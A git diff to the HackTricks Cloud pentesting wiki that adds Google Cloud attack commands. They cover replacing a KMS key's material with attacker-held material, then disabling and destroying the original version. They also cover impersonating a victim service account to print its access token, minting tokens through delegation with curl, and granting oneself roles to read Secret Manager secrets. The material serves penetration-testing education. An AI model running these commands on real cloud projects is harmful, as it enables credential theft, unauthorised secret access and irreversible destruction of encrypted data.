diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md index 21ba80bdb..bbcaf76c5 100644 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md +++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -90,6 +90,82 @@ gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_ * **Delete the KMS key** * Now only the attacker, who has the original key material could be able to decrypt the encrypted data +#### Here are the steps to import a new version and disable/delete the older data: + +```bash +# Encrypt something with the original key +echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt +gcloud kms encrypt \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --plaintext-file my-plaintext-file.txt \ + --ciphertext-file my-encrypted-file.enc + +# Decrypt it +gcloud kms decrypt \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --ciphertext-file my-encrypted-file.enc \ + --plaintext-file - + + +# Create an Import Job +gcloud kms import-jobs create my-import-job \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --import-method "rsa-oaep-3072-sha1-aes-256" \ + --protection-level "software" + +# Generate key material +openssl rand -out my-key-material.bin 32 + +# Import the Key Material (it's encrypted with an asymetrict key of the import job previous to be sent) +gcloud kms keys versions import \ + --import-job my-import-job \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --algorithm "google-symmetric-encryption" \ + --target-key-file my-key-material.bin + +# Get versions +gcloud kms keys versions list \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key + +# Make new version primary +gcloud kms keys update \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --primary-version 2 + +# Try to decrypt again (error) +gcloud kms decrypt \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --ciphertext-file my-encrypted-file.enc \ + --plaintext-file - + +# Disable initial version +gcloud kms keys versions disable \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key 1 + +# Destroy the old version +gcloud kms keys versions destroy \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --version 1 + +``` + ### `cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation` ```python @@ -201,7 +277,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md index 37b2fb896..c5902ba77 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -36,6 +36,11 @@ You can find a script to automate the **creation, exploit and cleaning of a vuln An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours. +```bash +gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \ + auth print-access-token +``` + You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). ### `iam.serviceAccountKeys.create` @@ -58,9 +63,22 @@ If you have the **`iam.serviceAccounts.implicitDelegation`** permission on a Ser ![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png) +Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation of `gcloud` only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. So here you have how to get a token using the API directly: + +```bash +curl -X POST \ + 'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'"${TARGET_SERVICE_ACCOUNT}"':generateAccessToken' \ + -H 'Content-Type: application/json' \ + -H 'Authorization: Bearer '"$(gcloud auth print-access-token)" \ + -d '{ + "delegates": ["projects/-/serviceAccounts/'"${DELEGATED_SERVICE_ACCOUNT}"'"], + "scope": ["https://www.googleapis.com/auth/cloud-platform"] + }' +``` + You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). -Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. + ### `iam.serviceAccounts.signBlob` @@ -82,6 +100,11 @@ An attacker with the mentioned permissions will be able to **add IAM policies to gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ --member="user:username@domain.com" \ --role="roles/iam.serviceAccountTokenCreator" + +# If you still have prblem grant yourself also this permission +gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ \ + --member="user:username@domain.com" \ + --role="roles/iam.serviceAccountUser" ``` You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.** @@ -141,7 +164,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md index 168fc5e7d..bc251cf7a 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md @@ -39,7 +39,13 @@ As this is also a post exploitation technique it can be found in: ### `secretmanager.secrets.setIamPolicy` -This give you access to give you access to read the secrets from the secret manager. +This give you access to give you access to read the secrets from the secret manager, like using: + +```bash +gcloud secrets add-iam-policy-binding \ + --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \ + --role="roles/secretmanager.secretAccessor" +```